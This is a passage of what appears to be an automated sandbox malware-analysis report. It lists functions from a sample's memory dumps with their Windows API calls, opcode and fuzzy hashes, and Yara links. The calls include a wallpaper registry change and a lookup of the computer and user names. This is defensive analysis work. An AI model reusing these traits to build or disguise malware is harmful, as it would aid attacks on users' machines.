                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .
                                                  • API String ID: 0-248832578
                                                  • Opcode ID: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                  • Instruction ID: db76f937e81630575b2700384d205b0ac401e8f874fa32e43cac1aabc581782c
                                                  • Opcode Fuzzy Hash: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                  • Instruction Fuzzy Hash: CB310471900209AFEB249E79CC84EEB7BBDDB86318F1101AEF91897251E6389D458B64
                                                  Function 0213D850 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .
                                                  • API String ID: 0-248832578
                                                  • Opcode ID: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                  • Instruction ID: 8fc54c86aa641a2fac74e115d7415c0e769dd0a2d918c9353c312c28b99a868a
                                                  • Opcode Fuzzy Hash: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                  • Instruction Fuzzy Hash: 3F312472940249AFCB259E78EC84EFA7BBFDF86314F0001A8F918D7251E730AA44CB50
                                                  Function 0210BDDE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0210BED3
                                                    • Part of subcall function 02102939: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 02102948
                                                    • Part of subcall function 02102939: RegSetValueExA.ADVAPI32(004655B0,0046BE08,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0210BEAD,0046BE08,004655B0,00000001,00473EE8,00000000), ref: 02102970
                                                    • Part of subcall function 02102939: RegCloseKey.ADVAPI32(004655B0,?,?,0210BEAD,0046BE08,004655B0,00000001,00473EE8,00000000,?,020F7C44,00000001), ref: 0210297B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateInfoParametersSystemValue
                                                  • String ID: Control Panel\Desktop
                                                  • API String ID: 4127273184-27424756
                                                  • Opcode ID: b2749757bbb715b84591827a24ab2664cb1dcc6a43466099e0f50718dd789739
                                                  • Instruction ID: 9ab671eeae67c124611c3645c435ed6476470cdacd36ee862979843014f3d557
                                                  • Opcode Fuzzy Hash: b2749757bbb715b84591827a24ab2664cb1dcc6a43466099e0f50718dd789739
                                                  • Instruction Fuzzy Hash: D3116D32BC421036D51834394D9BBAE2807D356B54FA1411AEB126A7C9EBDB4A9007DB
                                                  Function 00450D42 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                    • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                  • EnumSystemLocalesW.KERNEL32(00450E6A,00000001,00000000,?,<D,?,00451497,00000000,?,?,?), ref: 00450DB4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                  • String ID: <D
                                                  • API String ID: 1084509184-3866323178
                                                  • Opcode ID: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                  • Instruction ID: b1cdb4a87285138648e71eec5b58018a028c0508cbf90fbfa4a5e64eba390ba2
                                                  • Opcode Fuzzy Hash: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                  • Instruction Fuzzy Hash: 9C11293B2007055FDB189F79D8916BAB7A1FF8031AB14442DE94647741D375B846C744
                                                  Function 00450DDD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                    • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                  • EnumSystemLocalesW.KERNEL32(004510BA,00000001,?,?,<D,?,0045145B,<D,?,?,?,?,?,00443CEC,?,?), ref: 00450E29
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                  • String ID: <D
                                                  • API String ID: 1084509184-3866323178
                                                  • Opcode ID: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                  • Instruction ID: d323619e2976bd52c5edaa4f55efd93dda7e8b303aa23e489220a9c0c916f3e4
                                                  • Opcode Fuzzy Hash: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                  • Instruction Fuzzy Hash: 5BF0223A2003045FDB145F3AD882AAB7B95EF81729B25842EFD058B782D275AC42C644
                                                  Function 00447597 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID: GetLocaleInfoEx
                                                  • API String ID: 2299586839-2904428671
                                                  • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                  • Instruction ID: 80a81796b135a3e0eaabc3ca7fb48afb6b687e063e78a0117ef0368584b3b56e
                                                  • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                  • Instruction Fuzzy Hash: 82F0F031A44308BBDB11AF61EC06F6E7B25EF04712F00416AFC046A2A2CB359E11969E
                                                  Function 00440E20 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5fe4b2cb4502993dbea9aed901accaaf97bf6201a09a40e91719f5fde44f0d4f
                                                  • Instruction ID: cffdc6bb8eb20f5336ace8b102e865ec7dcfb2cf624fb46ac032ba80a60d6a90
                                                  • Opcode Fuzzy Hash: 5fe4b2cb4502993dbea9aed901accaaf97bf6201a09a40e91719f5fde44f0d4f
                                                  • Instruction Fuzzy Hash: 8A024C71E002199BEF14CFA9C9806AEBBF1FF88314F25826AD919E7350D735AD45CB84
                                                  Function 02131087 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6f628971186b7869ff55a994468a376647b4631b563bdc3b7b4e6f267e50c07e
                                                  • Instruction ID: fec2c544e9608d577a00c3b52852f5a5d585a465b45593d0f3e468fc148425f5
                                                  • Opcode Fuzzy Hash: 6f628971186b7869ff55a994468a376647b4631b563bdc3b7b4e6f267e50c07e
                                                  • Instruction Fuzzy Hash: DC022B72E40219AFDF15CFA9C8907AEB7B2FF48324F258269D919E7340D730A945CB90
                                                  Function 0041A7A2 Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetComputerNameExW.KERNEL32(00000001,?,0000002B,00474358), ref: 0041A7BF
                                                  • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Name$ComputerUser
                                                  • String ID:
                                                  • API String ID: 4229901323-0
                                                  • Opcode ID: b83c9b6e74ee29b4b3c5d203829dc1b50a3012795622bded812fc81b4dbbb1d6
                                                  • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                  • Opcode Fuzzy Hash: b83c9b6e74ee29b4b3c5d203829dc1b50a3012795622bded812fc81b4dbbb1d6
                                                  • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                                  Function 004520D2 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004520CD,?,?,00000008,?,?,00455412,00000000), ref: 004522FF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionRaise
                                                  • String ID:
                                                  • API String ID: 3997070919-0
                                                  • Opcode ID: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                                  • Instruction ID: 47108b7899804ebb5d40a9255b8f0d240b678f8396b787326aeb691ef157153f
                                                  • Opcode Fuzzy Hash: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                                  • Instruction Fuzzy Hash: C0B18F351106089FD715CF28C586B567BE0FF06325F29869AEC99CF3A2C379E986CB44
                                                  Function 02142339 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,02142334,?,?,00000008,?,?,02145679,00000000), ref: 02142566
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionRaise
                                                  • String ID:
                                                  • API String ID: 3997070919-0
                                                  • Opcode ID: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                                  • Instruction ID: acc39ee96cea19e3abf7d02ca2791d5f07ca396792062634423fa470b10160cd
                                                  • Opcode Fuzzy Hash: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                                  • Instruction Fuzzy Hash: 83B14C316506089FD719CF28C49ABA57BE0FF45368F298658FC9ACF2A1CB35D991CB40
                                                  Function 00432A49 Relevance: 1.8, Strings: 1, Instructions: 500COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  • Opcode ID: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                                  • Instruction ID: f72c02501a8b687524d4eed2bba9748ce27a8789a4669d3223b659a6f876a8a8
                                                  • Opcode Fuzzy Hash: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                                  • Instruction Fuzzy Hash: 8002B3727083004BD714DF39D95272EF3E2AFCC758F15492EF499AB391DA78A8058A4A
                                                  Function 02122CB0 Relevance: 1.8, Strings: 1, Instructions: 500COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  • Opcode ID: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                                  • Instruction ID: 8e594b5045575f5b63b918a656837bc2aaaf6cf3b6c9f4b517d4680f63ad016d
                                                  • Opcode Fuzzy Hash: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                                  • Instruction Fuzzy Hash: 2F029F3274C3108FD724DF39D951A2EB3E2BFC8754F15492DF885AB381DB74A8598A82
                                                  Function 004510BA Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                    • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free$InfoLocale_abort
                                                  • String ID:
                                                  • API String ID: 1663032902-0
                                                  • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                  • Instruction ID: 725ff80feb3504da526bb6f16fdbe645276de1ecdd37ac2f1e7666d8a95350e0
                                                  • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                  • Instruction Fuzzy Hash: 2D21B332500606ABDB249A25DC46B7B73A8EB09316F1041BBFE01C6252EB79DD48CB99
                                                  Function 02141321 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02137126: GetLastError.KERNEL32(?,0212E4C7,02129583,0212E4C7,00475B70,?,0212BBBC,FF8BC35D,00475B70,00473EE8), ref: 0213712A
                                                    • Part of subcall function 02137126: _free.LIBCMT ref: 0213715D
                                                    • Part of subcall function 02137126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 0213719E
                                                    • Part of subcall function 02137126: _abort.LIBCMT ref: 021371A4
                                                    • Part of subcall function 02137126: _free.LIBCMT ref: 02137185
                                                    • Part of subcall function 02137126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 02137192
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 02141375
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free$InfoLocale_abort
                                                  • String ID:
                                                  • API String ID: 1663032902-0
                                                  • Opcode ID: a9a0ef56855296d69f28970e91aa7ff08aa6ba5c63fbad7abcadd9e72279b5a0
                                                  • Instruction ID: 3c4607ccf3154329c90fb234f03d9cb5ffc45b0f6d42a0748ce746404669fd22
                                                  • Opcode Fuzzy Hash: a9a0ef56855296d69f28970e91aa7ff08aa6ba5c63fbad7abcadd9e72279b5a0
                                                  • Instruction Fuzzy Hash: 53218372990206AFDF249B29DC41BBB77A9EB05328F10017AED0DC6980EF75D985CB50
                                                  Function 02140FA9 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02137126: GetLastError.KERNEL32(?,0212E4C7,02129583,0212E4C7,00475B70,?,0212BBBC,FF8BC35D,00475B70,00473EE8), ref: 0213712A
                                                    • Part of subcall function 02137126: _free.LIBCMT ref: 0213715D
                                                    • Part of subcall function 02137126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 0213719E
                                                    • Part of subcall function 02137126: _abort.LIBCMT ref: 021371A4
                                                  • EnumSystemLocalesW.KERNEL32(00450E6A,00000001,00000000,?,02133F53,?,021416FE,00000000,?,?,?), ref: 0214101B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                  • String ID:
                                                  • API String ID: 1084509184-0
                                                  • Opcode ID: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                  • Instruction ID: 3a0b336a414b4358009ba3b83213a4e882d884d409f54c89e2589b11974faa49
                                                  • Opcode Fuzzy Hash: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                  • Instruction Fuzzy Hash: 91114C372003015FDB289F39D89167AB792FF84358B14453DE94A87A40D775B843CB40
                                                  Function 004512EA Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                    • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$InfoLocale_abort_free
                                                  • String ID:
                                                  • API String ID: 2692324296-0
                                                  • Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                  • Instruction ID: 964a9937ac5a020d26487979adcc3deadbef587b10f76395f6381cc8137ce6dd
                                                  • Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                  • Instruction Fuzzy Hash: 10F07D32500111BBEB286A25CC16BFF7758EB00716F15046BEC06A3651FA38FD49C6D4
                                                  Function 02141551 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02137126: GetLastError.KERNEL32(?,0212E4C7,02129583,0212E4C7,00475B70,?,0212BBBC,FF8BC35D,00475B70,00473EE8), ref: 0213712A
                                                    • Part of subcall function 02137126: _free.LIBCMT ref: 0213715D
                                                    • Part of subcall function 02137126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 0213719E
                                                    • Part of subcall function 02137126: _abort.LIBCMT ref: 021371A4
                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,021412EF,00000000,00000000,?), ref: 0214157D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$InfoLocale_abort_free
                                                  • String ID:
                                                  • API String ID: 2692324296-0
                                                  • Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                  • Instruction ID: ff50416ce090556919ee09ff198fe30ef35b7d1fa7dc34abde54637420c522de
                                                  • Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                  • Instruction Fuzzy Hash: 90F0F972990215BBDB285A24CC05BFA7778EB41354F050569EC0EA7140EF70FD81CAD0
                                                  Function 02141044 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02137126: GetLastError.KERNEL32(?,0212E4C7,02129583,0212E4C7,00475B70,?,0212BBBC,FF8BC35D,00475B70,00473EE8), ref: 0213712A
                                                    • Part of subcall function 02137126: _free.LIBCMT ref: 0213715D
                                                    • Part of subcall function 02137126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 0213719E
                                                    • Part of subcall function 02137126: _abort.LIBCMT ref: 021371A4
                                                  • EnumSystemLocalesW.KERNEL32(004510BA,00000001,?,?,02133F53,?,021416C2,02133F53,?,?,?,?,?,02133F53,?,?), ref: 02141090
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                  • String ID:
                                                  • API String ID: 1084509184-0
                                                  • Opcode ID: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                  • Instruction ID: fb902ec3413cfb9576680649bab29dff4228ea3cf0ecfb42eb1f6fac8a174bec
                                                  • Opcode Fuzzy Hash: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                  • Instruction Fuzzy Hash: 70F04C323003046FDB245F35DC80B7A7B91EF80358F05453CF90987680D771E8428640
                                                  Function 021377FE Relevance: 1.5, APIs: 1, Instructions: 37COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,021339B1,?,00000004), ref: 02137851
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID:
                                                  • API String ID: 2299586839-0
                                                  • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                  • Instruction ID: b31bf82cfa5ea52cc1eb158afcc6e72ce113c4f2a346263f5bc0aec0aed77be3
                                                  • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                  • Instruction Fuzzy Hash: 41F09671A85318BBCB126F609C05F7EBB67DF04711F0041B9FC0566291CB719A119A9A
                                                  Function 004470AE Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00444ACC: RtlEnterCriticalSection.KERNEL32(?,?,0044225B,00000000,0046DAC0,0000000C,00442216,?,?,?,00448739,?,?,00446F74,00000001,00000364), ref: 00444ADB
                                                  • EnumSystemLocalesW.KERNEL32(00447068,00000001,0046DC48,0000000C), ref: 004470E6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
